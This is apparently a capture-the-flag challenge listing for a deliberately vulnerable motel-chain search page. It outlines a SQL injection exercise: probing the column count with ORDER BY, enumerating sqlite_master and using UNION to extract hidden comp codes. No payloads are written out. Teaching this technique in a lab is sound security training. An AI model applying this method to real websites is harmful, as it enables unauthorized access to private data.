OffByOne
RoadTwelve Inn's city search has been running on the same code path since 1998. The corporate office uses the same database to track things guests shouldn't see.
The Scenario
RoadTwelve Inn's reservation site went online in 1998 and the search
endpoint has barely changed since. The original storage choice was
reasonable for a property catalog of three hundred rooms; nobody
revisited it when the chain grew past two hundred properties. Operations
needed somewhere to log the master comp codes for the corporate office
and put them next to everything else, because that was the database the
ops portal already knew how to reach.
Challenge Intel
Synopsis
RoadTwelve's city search renders seven columns. Find the column count, UNION across to the internal promo codes table, and read the master comp code.
What It Is
RoadTwelve Inn is a budget motel chain whose website lets customers search for a property by city. The search SELECT returns seven columns that get rendered as property cards on the results page. The internal_promos table — which holds the corporate master comp codes — sits in the same SQLite file. This is the canonical column-count-discovery + UNION extraction exercise. The lesson is the discipline of probing column count via ORDER BY, then placing the extracted value in the visible column slot.
Who It's For
Players who already understand UNION SQLi conceptually but want practice on the column-count probe step in a realistic property search.
Skills You'll Practice
- Quote-breaking SQLi via URL parameters
- Discovering column count via ORDER BY probing
- Mapping UNION columns to visible render slots
- sqlite_master enumeration
- Cross-table UNION extraction
What You'll Gain
- Reflex for ORDER BY probing as column-count discovery
- Pattern recognition for property/listing search → UNION extraction